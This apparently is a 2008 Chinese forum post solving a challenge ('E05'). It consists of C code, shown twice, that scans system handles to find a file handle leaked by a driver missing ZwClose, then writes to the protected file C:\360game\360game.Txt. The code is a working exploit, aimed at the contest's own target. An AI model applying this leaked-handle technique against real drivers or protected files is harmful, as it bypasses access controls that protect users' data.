-
-
[讨论]E05[
-
发表于: 2008-11-22 13:11
-
//软柿子
//其实这种方法有问题,如果FAT32就挂了
__inline int operator==(FILETIME time1, FILETIME time2)
{
return (time1.dwHighDateTime == time2.dwHighDateTime) && (time1.dwLowDateTime == time2.dwLowDateTime);
}
int _tmain(int argc, _TCHAR* argv[])
{
//DeleteFileA("C:\\test.txt");
//BOOL bSuc = ::CreateHardLinkA(
// "C:\\test.txt","C:\\360game\\360game.Txt",NULL);
//if(bSuc == FALSE){
// puts("CreateHardLink");
// goto failed;
//}
CreateFileA(
"C:\\360game\\360game.Txt",
FILE_GENERIC_WRITE | FILE_GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
NULL,
NULL);
if(GetLastError() != 5){
printf("错误的操作,请勿用其他任何工具访问此文件");
exit(-1);
}
HANDLE hFile = INVALID_HANDLE_VALUE;
PSYSTEM_HANDLE_INFORMATION_EX pShie;
PSYSTEM_HANDLE_INFORMATION pShiTemp;
PFNTQUERYSYSTEMINFORMATION pfNtQuerySystemInformation;
DWORD dwReqSize, dwMaxSize, dwCount = 0;
long nStatus;
pfNtQuerySystemInformation = (PFNTQUERYSYSTEMINFORMATION)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
if (pfNtQuerySystemInformation != NULL)
{
dwMaxSize = DEFAULT_SHI_ARRAY_SIZE;
pShie = (PSYSTEM_HANDLE_INFORMATION_EX)malloc(dwMaxSize);
while ((pShie != NULL) &&
((nStatus = pfNtQuerySystemInformation(SystemHandleInformation, pShie, dwMaxSize, &dwReqSize)) == STATUS_INFO_LENGTH_MISMATCH))
{
dwMaxSize = (dwReqSize >= dwMaxSize)?dwReqSize:(dwMaxSize+DEFAULT_SHI_ARRAY_SIZE);
pShie = (PSYSTEM_HANDLE_INFORMATION_EX)realloc(pShie, dwMaxSize);
}
if (nStatus == 0)
{
dwCount = pShie->NumberOfHandles;
pShiTemp = pShie->Information;
while (--dwCount != 0xFFFFFFFF)
{
if (GetCurrentProcessId() == pShiTemp->ProcessID)// && (pShiTemp->ObjectTypeNumber == OB_TYPE_FILE))
{
//printf("Handle: %.4X Type: %d Object: %.8X\n", pShiTemp->Handle, pShiTemp->ObjectTypeNumber, pShiTemp->Object);
//ScanSystemHandle(dwSystemProcId, (HANDLE)(pShiTemp->Handle));
BY_HANDLE_FILE_INFORMATION info;
if(GetFileInformationByHandle((HANDLE)pShiTemp->Handle,&info)){
WIN32_FILE_ATTRIBUTE_DATA data;
GetFileAttributesExA("C:\\360game\\360game.Txt",GetFileExInfoStandard,&data);
if(data.dwFileAttributes == info.dwFileAttributes &&
data.ftCreationTime == info.ftCreationTime &&
data.ftLastAccessTime == info.ftLastAccessTime &&
data.ftLastWriteTime == info.ftLastWriteTime &&
data.nFileSizeHigh == info.nFileSizeHigh &&
data.nFileSizeLow == info.nFileSizeLow){
hFile = (HANDLE)pShiTemp->Handle;
printf("filehandle found : \r\n handle = 0x%08X",hFile);
}
}
}
pShiTemp = (PSYSTEM_HANDLE_INFORMATION)((LPBYTE)pShiTemp + sizeof(SYSTEM_HANDLE_INFORMATION));
};
}
if (pShie != NULL)
free(pShie);
}
BOOL bSuc = FALSE;
if(hFile == INVALID_HANDLE_VALUE){
puts("CreateFile !");
goto failed;
}
BYTE Buffer[64];
DWORD dw;
strcpy((char *)Buffer,"360game");
bSuc = WriteFile(hFile,Buffer,sizeof(Buffer),&dw,NULL);
if(bSuc == FALSE){
puts("WriteFile");
goto failed;
}
goto end;
failed:
printf("failed with code :%d \r\n",GetLastError());
end:
if(hFile != INVALID_HANDLE_VALUE){
CloseHandle(hFile);
}
system("PAUSE");
return 0;
}
软柿子啊. 驱动少写了一句ZwClose. 默哀三分钟.
所以句柄还是存在的,只是不知道序号是多少而已.
所以测试的时候不要用其他进程不要去打开这个文件.否则如果这个进程以FILE_SHARE_NONE打开,就挂咯
//其实这种方法有问题,如果FAT32就挂了
__inline int operator==(FILETIME time1, FILETIME time2)
{
return (time1.dwHighDateTime == time2.dwHighDateTime) && (time1.dwLowDateTime == time2.dwLowDateTime);
}
int _tmain(int argc, _TCHAR* argv[])
{
//DeleteFileA("C:\\test.txt");
//BOOL bSuc = ::CreateHardLinkA(
// "C:\\test.txt","C:\\360game\\360game.Txt",NULL);
//if(bSuc == FALSE){
// puts("CreateHardLink");
// goto failed;
//}
CreateFileA(
"C:\\360game\\360game.Txt",
FILE_GENERIC_WRITE | FILE_GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
NULL,
NULL);
if(GetLastError() != 5){
printf("错误的操作,请勿用其他任何工具访问此文件");
exit(-1);
}
HANDLE hFile = INVALID_HANDLE_VALUE;
PSYSTEM_HANDLE_INFORMATION_EX pShie;
PSYSTEM_HANDLE_INFORMATION pShiTemp;
PFNTQUERYSYSTEMINFORMATION pfNtQuerySystemInformation;
DWORD dwReqSize, dwMaxSize, dwCount = 0;
long nStatus;
pfNtQuerySystemInformation = (PFNTQUERYSYSTEMINFORMATION)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
if (pfNtQuerySystemInformation != NULL)
{
dwMaxSize = DEFAULT_SHI_ARRAY_SIZE;
pShie = (PSYSTEM_HANDLE_INFORMATION_EX)malloc(dwMaxSize);
while ((pShie != NULL) &&
((nStatus = pfNtQuerySystemInformation(SystemHandleInformation, pShie, dwMaxSize, &dwReqSize)) == STATUS_INFO_LENGTH_MISMATCH))
{
dwMaxSize = (dwReqSize >= dwMaxSize)?dwReqSize:(dwMaxSize+DEFAULT_SHI_ARRAY_SIZE);
pShie = (PSYSTEM_HANDLE_INFORMATION_EX)realloc(pShie, dwMaxSize);
}
if (nStatus == 0)
{
dwCount = pShie->NumberOfHandles;
pShiTemp = pShie->Information;
while (--dwCount != 0xFFFFFFFF)
{
if (GetCurrentProcessId() == pShiTemp->ProcessID)// && (pShiTemp->ObjectTypeNumber == OB_TYPE_FILE))
{
//printf("Handle: %.4X Type: %d Object: %.8X\n", pShiTemp->Handle, pShiTemp->ObjectTypeNumber, pShiTemp->Object);
//ScanSystemHandle(dwSystemProcId, (HANDLE)(pShiTemp->Handle));
BY_HANDLE_FILE_INFORMATION info;
if(GetFileInformationByHandle((HANDLE)pShiTemp->Handle,&info)){
WIN32_FILE_ATTRIBUTE_DATA data;
GetFileAttributesExA("C:\\360game\\360game.Txt",GetFileExInfoStandard,&data);
if(data.dwFileAttributes == info.dwFileAttributes &&
data.ftCreationTime == info.ftCreationTime &&
data.ftLastAccessTime == info.ftLastAccessTime &&
data.ftLastWriteTime == info.ftLastWriteTime &&
data.nFileSizeHigh == info.nFileSizeHigh &&
data.nFileSizeLow == info.nFileSizeLow){
hFile = (HANDLE)pShiTemp->Handle;
printf("filehandle found : \r\n handle = 0x%08X",hFile);
}
}
}
pShiTemp = (PSYSTEM_HANDLE_INFORMATION)((LPBYTE)pShiTemp + sizeof(SYSTEM_HANDLE_INFORMATION));
};
}
if (pShie != NULL)
free(pShie);
}
BOOL bSuc = FALSE;
if(hFile == INVALID_HANDLE_VALUE){
puts("CreateFile !");
goto failed;
}
BYTE Buffer[64];
DWORD dw;
strcpy((char *)Buffer,"360game");
bSuc = WriteFile(hFile,Buffer,sizeof(Buffer),&dw,NULL);
if(bSuc == FALSE){
puts("WriteFile");
goto failed;
}
goto end;
failed:
printf("failed with code :%d \r\n",GetLastError());
end:
if(hFile != INVALID_HANDLE_VALUE){
CloseHandle(hFile);
}
system("PAUSE");
return 0;
}
软柿子啊. 驱动少写了一句ZwClose. 默哀三分钟.
所以句柄还是存在的,只是不知道序号是多少而已.所以测试的时候不要用其他进程不要去打开这个文件.否则如果这个进程以FILE_SHARE_NONE打开,就挂咯
